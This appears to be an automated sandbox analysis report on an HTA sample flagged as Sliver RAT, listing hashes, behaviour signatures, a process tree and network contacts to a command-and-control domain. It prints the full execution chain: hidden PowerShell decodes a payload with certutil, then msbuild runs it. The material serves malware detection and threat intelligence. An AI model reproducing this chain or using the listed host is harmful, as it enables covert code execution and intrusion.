SHA512 73a3a1049e9a682cd35316b48edc1a832943a16aa5bf3cfd25381f34d7f30677de6234c4c1ca1aad2345173146afa4c2a2e026e134fcb56e850264743c1ef6e2

memory/408-65-0x00000198CC250000-0x00000198CC258000-memory.dmp

memory/408-76-0x00000198E74A0000-0x00000198E74C2000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.cmdline

MD5 4c7530d0eaab0215c1344af377ac1eb9
SHA1 01946081e34b0d0de489a0fec2eae5898f0eb44f
SHA256 c86eb175130b3371d9b107749e1dcf79e195e65df9a7a72d4ede746cf8151f01
SHA512 870f090e8e0a3636b297071d51502957424a89786a7730e963e60b1cfd9cdfd0f77a6502712be21a5cd882ba87759f07f9006d35b3821b2644f472f574adc46d

\??\c:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.0.cs

MD5 9dc0e32c32d7b3cfd2f819d8c0e4c7a5
SHA1 267cb8f96e02e298033786efd8ee6d87a73418a3
SHA256 67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac
SHA512 c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

\??\c:\Users\Admin\AppData\Local\Temp\oiaydg3g\CSCD8E0469648454CA48B693F4F20AB42A2.TMP

MD5 2a8ef291fe271e5f63618cea93340f30
SHA1 409b95b3d8bcc59056934aa83aa557ea6ba8a0a2
SHA256 ff53d0f527949cfed8a4ff80a404a6df5b96294329ce5ebf90201166fe714926
SHA512 75f527df790c12c38bf4c754d5ec7d758c19a8c45cc24bf0892f549ac30dc578ec14f6989951446623debcfd071ebaa7f797f29762f23589b41ebe38074078bd

C:\Users\Admin\AppData\Local\Temp\RES7196.tmp

MD5 d3d6715508aff9aaf3a9af18a46d3b3e
SHA1 438e1e7f48f909b01a8e0d2b45e7088e4ea3c597
SHA256 029089cf9b556af519e881cfe3d205b62814620364a5021d79f3da3b6045f8cf
SHA512 53f4a0f952f745fab78f589df9662e93d313083a13e58a6e8b746cf7ceea600a0c1dbacd1b9cf51c5f77940052a7c057f1c1119862562202377bc3d527bd7858

C:\Users\Admin\AppData\Local\Temp\oiaydg3g\oiaydg3g.dll

MD5 d0c0d76869ab19056ab9790b4032d147
SHA1 394f8d478310149eb6129bc012646146c57f257d
SHA256 46a90e37fe32cf3cbbb41e2bc3d266a7e82c9c94b80f8255668319c55afc9104
SHA512 17d16c57f9e7352acc6854276c554b370b42989ebef1e4304d845f117b32d8b07164460d9ea1b139164144070be6010c151e89c3c1f7d9159ffad137868bf82c

memory/408-89-0x00000198CC2B0000-0x00000198CC2B8000-memory.dmp

memory/2780-91-0x0000000074FEE000-0x0000000074FEF000-memory.dmp

memory/2780-92-0x0000000074FE0000-0x0000000075790000-memory.dmp

memory/408-93-0x00000198E74D0000-0x00000198E7F4B000-memory.dmp

memory/408-94-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

memory/408-96-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

memory/408-97-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

memory/408-95-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

memory/408-99-0x00000198E89D0000-0x00000198E94B4000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 02:22

Reported

2024-11-07 02:25

Platform

win7-20240903-en

Max time kernel

117s

Max time network

149s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta"

Signatures

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2668 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 2804 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2804 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2804 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2804 wrote to memory of 2736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2804 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2804 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2804 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2804 wrote to memory of 2608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2608 wrote to memory of 2068 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 2068 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 2068 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2068 wrote to memory of 2428 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2068 wrote to memory of 2428 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2068 wrote to memory of 2428 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2608 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 1468 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1468 wrote to memory of 2644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1468 wrote to memory of 2644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1468 wrote to memory of 2644 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2608 wrote to memory of 1988 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 1988 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2608 wrote to memory of 1988 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1988 wrote to memory of 1656 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1988 wrote to memory of 1656 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1988 wrote to memory of 1656 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo ... > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml

C:\Windows\SysWOW64\certutil.exe

"C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA08.tmp" "c:\Users\Admin\AppData\Local\Temp\rap5hawp\CSCF26624058E1A4BB384F3E2C5E5C567FF.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFB9E.tmp" "c:\Users\Admin\AppData\Local\Temp\uvr1odp3\CSCCC4078AC4EA14897A4C1BE2CD61C744F.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB85.tmp" "c:\Users\Admin\AppData\Local\Temp\q34g0sfo\CSCDC5E0A422F0046288051387835E2983E.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 secure.cloudtechnologiesusa.com udp
US 23.239.28.166:8081 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:8080 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp

Files

\??\c:\windows\temp\enc3.txt

MD5 940ed0fa0b1fc8ed6fbf279ab67af56f
SHA1 da4b7c40029542659f025ae74fa0be0fb0fa473c
SHA256 731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686
SHA512 934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

C:\windows\temp\d.xml

MD5 6c2a8d820d8d80182aacdc125399cd71
SHA1 51ccd1e0c3247bf24da813a1f660a367f8deefc8
SHA256 104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a
SHA512 c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

\??\c:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.cmdline

MD5 7f7ea98b7ffefa4148339e022deb1421
SHA1 f45f37a4cf471a061a103e2eeb8ebbfc9beaa88f
SHA256 a1a3b9ae46c66e548cb34772fe28f0ebc7b4bd00099f18f95b9e99cfab2dd5b1
SHA512 931b879bbe85d9979e9b529fe3d55b236b40f0b66b0c8a57920f6cb426d6711c17d6b50407552b41127d838cef05688df50ff5defdec2c814b3349f9dbca177b

\??\c:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.0.cs

MD5 4a4ff4a5e71cabe4864c862a697c1e27
SHA1 b95fb7438213c3ae9caf0e8b52bb301fefcddb56
SHA256 70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb
SHA512 7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

\??\c:\Users\Admin\AppData\Local\Temp\rap5hawp\CSCF26624058E1A4BB384F3E2C5E5C567FF.TMP

MD5 975f3db8ad310f8d07485ba6057627e6
SHA1 cce9dd7d85017ffe31754fbdecf123a63ad808f6
SHA256 c7b56885f11e8cbadcf0dec084d735f6ef99efa3b9b385a6f8715c911e1a6468
SHA512 8d9101d42d27cff6e494864637da73806154d1dd7539cc65e6872e12af6137a24b2bde904e306168e5b3366f25d9c8cbaad96ec9603e2bbf1b67d523bfb89cdd

C:\Users\Admin\AppData\Local\Temp\RESFA08.tmp

MD5 059d763978f44394a96d790ad381d627
SHA1 84de0891b9d1a612a43329f4b4fa89c942c20f47
SHA256 2f43601dd30182474d7bece67a2dfc1e3cd6f330b63265052939e29067222111
SHA512 7df372ee7681acc29c3ccd9296978d203f8b341e1ecbdf7132a3d72d94e6dd5c683299a90363d34aae41824789125907d2941e483dfd465c2bb524318de97045

C:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.pdb

MD5 f90a0868fac538a2e1774f077a60b787
SHA1 a0e8d2d95dd6d234bd306f2469a002f3ae1a8b16
SHA256 e183acb064d051a7b8ed45e55ba53b6d1fdaca056b73a12593ebe2af55ba88a0
SHA512 d2f3720ae12c930743886615016e8dbb3864231a6c7acc310509c79fb3b136302a33511e630f2a444ce8704167873c63c184bc20d0a735146b9341d65c0c47d9

C:\Users\Admin\AppData\Local\Temp\rap5hawp\rap5hawp.dll

MD5 6e6d7a9f1bfd1acf7fc9642cc26689d1
SHA1 5e5b061a5fd527d0abc579b007ddd3c79ebb6adb
SHA256 2fc27e006527cd3c08ace32420447c47f7404eee78ca10cf4b635166bd609ce8
SHA512 6f28086b9d486f1f1a22ed7ab3b2a63e3678784527bfa200cf8af084677eeda7616446ccbb1791f2478af5a405d8193428c710ca6579dabf5e556b90ff68fa8d

\??\c:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.cmdline

MD5 189b7ea288b96a9f01cba2cf2aa9d4ff
SHA1 32380e5f74f961044e172f3487e9f103e3016a92
SHA256 803f01022b445b4b603876e53b6b7af17bad6f703575566bf2fa0003614edd16
SHA512 bc5e7be4cd5111a16c9abb7b29509556d3801cc903e31b8dfb68864de60c60272e9d637b773c2699ff8123ceae0392361ae3a1880ff06bdcf81a946d1c73166f

\??\c:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.0.cs

MD5 da1f4b7b1a87cc475dfa05923b6301a0
SHA1 0e2ff764c519bc8169b66437857f01e25676e343
SHA256 624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e
SHA512 d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

\??\c:\Users\Admin\AppData\Local\Temp\uvr1odp3\CSCCC4078AC4EA14897A4C1BE2CD61C744F.TMP

MD5 13b2b8337c041860a14830209cb53120
SHA1 87ee1495ad526e3b6ca041817f456b25d839165b
SHA256 87f90cd0a8588c37bb9ca26dcada8b5eda5de60d44b9e1e678c80aa463ab4319
SHA512 fd73168e1b6a7e53e7c7ed279b1e82a46fdf079333fbf2d9e292cd651d62d3393eddffa37a7403466068dcaeb1c9b6462abc28303f98c812c5fe9125ffa988eb

C:\Users\Admin\AppData\Local\Temp\RESFB9E.tmp

MD5 6f721db86ac76182ff58fb910c5fc239
SHA1 08680448b5ba8b8fdac1a328e19ef6eeabedc0c4
SHA256 06bcb64a29cf6a1e19900a545a42cd7eb02ac690ec5cccb3232909dc3a308aab
SHA512 b7bb8535b61a82e33a70961586349bbf9b4212c0f302b4bf6492c8f11e67b2ca8c32b8154375b4dc17890405672c4935796ae6de8b1cf8483611900305124423

C:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.dll

MD5 114b1beeb338159cf8e10d252edf88c7
SHA1 35e52e4d532240156e9d67553c5c49f12056484e
SHA256 87dbf0b68a17d040d0214327badaf9e52a853bb39fed1dda970ffdf21916b883
SHA512 80b12face81b75a64d86f3e268eee55cf9eb9c8887d951fd7aea87cabe215ae2b4cd61bfff0451e4f9e44c5fd6edebee26de9329ac18879f52371066d1cfe010

C:\Users\Admin\AppData\Local\Temp\uvr1odp3\uvr1odp3.pdb

MD5 8e5d9e2a3d80b8bb75538a1a10866e0e
SHA1 930e6f5a91ce56cd53cbda562441fe4319ff300f
SHA256 5cfb07bab99cd1130285b1cb776832f2a7c7a0e47f88044d8925048f1a54a118
SHA512 113af6496ccc90e744d4711f82859a7910220aae04ec7507bc5f0238d77d5ec68b87a0b7df3c5e2572dc6d3e095378fbd853db3f85b1883151236129066253fa

\??\c:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.cmdline

MD5 d6bf783d5c8706d2fd004bd7ec151497
SHA1 cba5d782d2ff529c482f82676a5ab9ca8c493cc1
SHA256 ef7b625aa1fd1982b688a98eb869d15fbc684433b536aa5a27a1be057f1fb2f6
SHA512 38369968fdcfc0a7a91e9ee94e272aaa6072c9ddf8eaf3111279d1834d5d9855b249bcde60a6370f37a512d824bc2f888a95ae002b572ab7e7a6ab740f4c20d8

\??\c:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.0.cs

MD5 9dc0e32c32d7b3cfd2f819d8c0e4c7a5
SHA1 267cb8f96e02e298033786efd8ee6d87a73418a3
SHA256 67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac
SHA512 c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

C:\Users\Admin\AppData\Local\Temp\RESB85.tmp

MD5 b636d93d946eda16360d07ac4f32cb57
SHA1 185fa4c867b340e3b626b07b7da121fad583bbf4
SHA256 ef537566c040cdd0156c273971e5f2775ff7c35d609a8f9938030e9b06c7c463
SHA512 f9d800accdb5e7795415947461b2171925574f60f24344c3b3e0051f03b5b7fb72ca8848ffe673688498bdfbed67514e62878b440bf88377447254470f4c456f

\??\c:\Users\Admin\AppData\Local\Temp\q34g0sfo\CSCDC5E0A422F0046288051387835E2983E.TMP

MD5 e1311619232894838c587e794d5a9f2c
SHA1 4dbeeeb7662e00f32d8ad8eab5dda3056cf10c73
SHA256 2824ac96ff847775d2e48a47932dba3e3abb628336148bb203efe096df10231e
SHA512 6b92fd135368304b03bec4410d7209d0b1591f7b93e93450a50f85c2a2bf657d05e4e12eecda127d06dc9eea124692b2370e43aa73c1cd9c7911db27e85cbb54

C:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.pdb

MD5 27e70ee56180654ecd7cbaa1020af339
SHA1 6cdade9cff518a10a71b107b7f7b2b445416f661
SHA256 492ba14f8a06a48874e86f703085787a155a5047de5451237473ad385ade7c8c
SHA512 b1c2730c118f8a9aaa618922c26a4af156ce28a3f32b617fc2f0f071f8223a37d0bcf525f816bad590d941c49282d2e8cd0d9a8160895314674a51bb81ee19a6

C:\Users\Admin\AppData\Local\Temp\q34g0sfo\q34g0sfo.dll

MD5 e83111bed19fbb1fa6dd36225ca675a6
SHA1 d3838a0d5a521be5543b2a133662e984bba522b0
SHA256 0c460779934a8e1d9743aa7ae75ef8a21b8d23705fb068b7108bb890650ba634
SHA512 a12ca11ddd160d10c81f31d1b39999c10d268dac513b7cda4e0a1f794228bc05daff89b68fe348c9e5bb53e5927d15b9e9fc722344352cd858d6996953aa22ca
